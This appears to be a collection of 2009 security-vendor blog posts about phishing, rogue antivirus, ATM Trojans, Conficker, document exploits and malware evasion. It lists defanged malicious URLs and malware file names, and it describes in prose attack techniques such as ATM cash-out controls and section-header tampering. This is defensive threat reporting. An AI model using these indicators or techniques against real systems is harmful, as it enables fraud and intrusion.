Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATM machines. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3,  The Register also raised public awareness by covering the story. 

When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

The attacker can also-–through a password-protected routine–control the currency-dispensing ATM cassette:

We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

Yesterday, we came across to a new variant of a rogue security program. This one is called Malware Doctor, and we detect it as FakeAlert-D Trojan  with our DAT 5635.

The new variant comes from the following web pages:
hxxp://internetware-sa{blocked}.com/
hxxp://mal-ware{blocked}.net

As do most other rogue security programs, Malware Doctor displays misleading fake alerts to entice users into buying a product to “repair” malware problems.

We also noticed some new features in Malware Doctor. Once installed, it performs a system scan:

Users see a message indicating this “unregistered” version of Malware Doctor won’t be able to heal or remove infected files and asking the user to activate it at a cost.

Unlike many rogue security programs, which displays excessive fake alerts, this version of Malware Doctor reports only few detections so users will not be very suspicious of it.

Once this Trojan detects a supposedly malicious file, it will pop up a message:

This Trojan even makes use of McAfee’s malware naming convention:

This Trojan also displays information of supposedly known viruses whose information is taken from McAfee’s Virus Information Library.

As of today, the malicious website hosting this Trojan makes use of another AV vendor’s malware naming convention. However, the installer for this Trojan no longer exists on the Trojan’s website.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Keep your AV signatures up to date!

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the sign “Secure Area” did not complement the nonsecure HTTP URL.

Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading .

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles…..

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use it if you can avoid it.

A distributed denial-of-service (DDOS) attack on DNS servers of a domain registrar coupled with bad program logic in a popular media application caused network outages in parts of China last week.

Baofeng is a widely popular media player in China, with a total of 200 million users and several million users online simultaneously. The player starts when Windows boots and connects to Baofeng’s online server; then it’s designed to send DNS queries to DNS servers to get the IP addresses of different online servers until it gets an answer. Because of its massive number of online users, it would be a powerful DDOS attack tool if all online Baofeng programs were to send continuous DNS queries at the same time, especially if the authoritative DNS server could not answer the queries.

Several DNS servers of DNSPod (a Chinese domain service provider and registrar) were hit by a DDOS attack on the night of May 18. These DNS servers became inaccessible. The assault was meant to be a targeted attack against one company, but one of the customers of DNSPod is Baofeng.com, whose authoritative DNS server was the server under attack. Because of a design flaw in Baofeng’s media player, all online Baofeng programs started continuously sending DNS queries after the DNS responses previously cached by other servers timed out on May 19. The massive number of DNS queries flooded the network of China Telecom (one of the biggest ISPs in China). As a result, users in parts of China were unable to access websites.

The initial DDOS attack that targeted a specific domain registrar now transformed into a DDOS attack on almost all DNS servers in China, so we can see how a bad design in a program “helped” the attacker(s) amplify the attack.

Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, and like in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit of critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a U.S. senior intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008.
We can see two guys hacking a central light system and then playing space invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Inititiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the offical program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future!

In March 2009, we notified our customers on a new variant of the infamous Vundo trojan family which we detected as Ransom-F and raised its risk assessment to a Low-Profiled threat.  It was possibly the first indicators of a shift in the FakeAlert criminal model from instilling fear, to holding information technology resources for ransom but certainly not the last.

Last week, we came across to a new variant of a rogue security program branded by its creators as “System Security 2009″ and detected them as FakeAlert-CO, and some of its past similarly branded cousins as FakeAlert-SystemSecurity.

The updated variants were discovered from a web page hosted on trustedw{blocked}security.com.As most other rogue security programs to date, FakeAlert-CO displays spurious alerts and making fraudulent claims of infections that requires the user to pay a fee to “repair”. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-COthat resembles some common characteristics of ransomware trojans.

Once installed, FakeAlert-CO may either terminates all running user process or prompts the user to reboot.

In either cases, it follows to pretend to perform a system scan and report detections of false and exaggerated threats.

What differs it from older variants, is that the user will no longer be allowed to open or execute any applications including Task Manager, Command Prompt or other system and office applications which are terminated by FakeAlert-CO. A message is displayed to the user to indicate that the files are infected and to resolve the issue, the user must activate FakeAlert-CO at a cost.

The “product” website is made to look fairly professional offering an option to purchase a 2-year license, or lifetime support license at a “discount” and even comes with 30-day money back guarantee!

You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

Uninstalling the System Security “product” will not be an option for the typical user, as there is neither an uininstaller function nor will the “Add or Remove Programs” in the control panel be allowed to be opened via the usual means.

However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

Recently, our APAC threat intelligence team discovered a couple of Windows kernel zero-day vulnerabilities in the field, which could be potentially used for malicious purposes.  These were discovered in some discussion forums in China.

One of these issues exists in Windows NT/2000/XP according to the description provided. The issue arises due to insecure win32 syscalls, the buffer being supplied from usermode. This can lead to a Blue Screen Of Death (BSOD) if the kernel address is overwritten, leading to a Denial of Service (DoS) condition.  However, this issue requires admin privileges and hence cannot lead to a privilege escalation. But a deeper look suggests that this could be used to subvert or install kernel mode hooks, which can be used for malicious purposes.

Besides this issue, another kernel bug with similar behavior was found recently in the field. In this case it involved atapi.sys. 

The cause of this bug is also the same: It doesn’t verify the data passed from user mode and results in a buffer overflow. In most cases it will also cause a BSOD.

From the point of view of software design, data passed from user mode should never be trusted and must be always validated. Many of the known Windows local vulnerabilities exist because of this reason. Microsoft noticed this problem and fixed many potential defects in the kernel’s main module. However, many defects still exist in the win32k kernel part because it’s extremely complex. Most kernel vulnerability diggers are now targeting this module and have discovered many vulnerabilities in the past two years. With Windows 7 we will hope that kernel security will grow stronger.

We’ve notified Microsoft of both of these issues before posting this blog and technical details have been omitted here as the vulnerabilities are unpatched. We’ll do a follow up post after the issues are resolved.

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

•  “More Comments Regarding Conficker“
•  “W32/Conficker: Much Ado About Nothing?“.

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on the communication channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the nonfamily friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

It’s hardly a love song.

There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

We’ve all read of social engineering tactics before and how gullible users fall prey to many tactics used by virus authors. As researchers we often give recommendations to family and friends on how not to fall prey to such tricks, but once in a while we need to remind ourselves too that we are included in the intended list of targets.

As researchers we deal with different flavors of malware. Over time and with experience researchers often reach a state of “enlightenment” where you look at a sample and you know if it’s malicious. At least that’s what we believe; however there are times where we too are made to think twice. When dealing with malware it’s not uncommon for analysts to come across a note from the authors once in a while. At times they are taunts and at times they are something more like the example below. We came across a sample which contains messages for security researchers asking to not add detections for the file as this is not a virus. Considering that there are legitimate packers that put warnings for researchers to prevent falsely detecting them, such non-verbal communication can at times make one take a second look.

Besides the fact that they seem to agree that they have authored this program , technically they are right – this is not a virus, but a trojan downloader !!  This trojan silently downloads arbitrary files (porn dialer in this particular case) from remote site (hxxp://[skipped].com/del/cmb_[random].exe) and executes it. (New detection added to detect both samples is “Generic.acf”)

A second example was a little more fascinating for us. Researchers often take two approaches to analysis: Static (opening up the file in Hiew or other similar tools) and Dynamic (replicating the malware). In this case we opened the file in Hiew and the first thing that was apparent was that the file had abnormal resources and import data.

Moving past this error, we also noticed that the Entry Point mentioned in the header is 0001A001 and for an Image Base of 00400000, we should be able to get Hiew to go to the EP which should be at 0041A001. However it looks like the file ends at 00410DFF causing Hiew to fail reaching EP.

At this point in our minds we are more or less sure that this file is corrupt and it could be the end of analysis, but WAIT !!! Though we may be certain the Windows Loader will complain if we attempt to execute this sample, it actually runs like a charm. OK things are getting really fishy, so back to the drawing board we go. We re-open the file up in Hiew and this time we observe in more detail, the section header.

There are 10 odd looking sections which is fine, some of the sections have Physical Size as 0 and others overlap which though suspicious is fine too. And then we stumble upon the possible culprit. The authors have modified the Physical Size of the first two sections to FF003000 and FF000200 respectively where as their Virtual Sizes are 3000 and 1000. Patching the section sizes to 00003000 and 00000200 fixes the EP issue in Hiew allowing it to get to the correct EP.

Heck even IDA wasn’t able to load the files and gave the following errors and quit: “Virtual Array: Address space limit reached”

Olly on the other hand mentions the large section size but still loads it comfortably.

Clearly the authors are attempting social engineering here by crafting the section table. A second opinion is also that using this technique might trick certain AV products to mis-load such files. We’d like to hear your thoughts too…..

So the moral of the story is, don’t judge a book by its cover or malware based on only one tool, drink more coffee and keep at it. Happy Researching !!  [We currently detect this as Spy-Agent.dp.gen]

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, its drops the file server.exe into the user’s system directory:

Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

When I wrote a scanner plug-in this week for an old directory traversal vulnerability–CVE-2008-4419–I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.

Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.

The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers.

So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.

To download the HP firmware updates and upgrade instructions, click here.

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

